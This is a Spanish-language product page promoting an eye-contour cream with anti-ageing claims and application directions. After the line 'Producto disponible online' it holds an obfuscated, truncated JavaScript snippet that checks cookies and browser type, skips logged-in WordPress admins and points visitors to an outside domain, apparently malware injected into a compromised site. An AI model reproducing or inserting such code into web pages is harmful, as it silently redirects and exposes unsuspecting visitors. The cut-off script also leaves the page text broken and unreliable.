Este producto, está inspirado en las inyecciones de Ácido Hialurónico para hacer un efecto de relleno y minimizar los signos de envejecimiento. También potencia la producción de esta sustancia en las primeras capas de la piel.

Super Corrective Eye Cream, es un avanzado tratamiento para el contorno de los ojos que mejora la apariencia de esta delicada zona con un efecto lifting. Aumenta la elasticidad desde las capas más internas de la piel y restaura la expresión y la definición de la mirada. La flacidez y las arrugas también se disminuyen, y las ojeras mejoran considerablemente.

Por otro lado, contiene un sistema de hidratación inteligente, que controla la hidratación del contorno manteniendo esta zona tan delicada, perfectamente hidratada para conseguir una piel firme, suave y de apariencia joven.

A la hora de aplicarlo, hay que utilizar el dedo anular, y aplicarlo sobre todo el contorno de los ojos tanto de día como de noche.

¡No permitas que tu contorno de ojos tenga un aspecto poco juvenil, tienes a tu alcance los productos necesarios para que eso no ocurra!

 

Producto disponible online var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone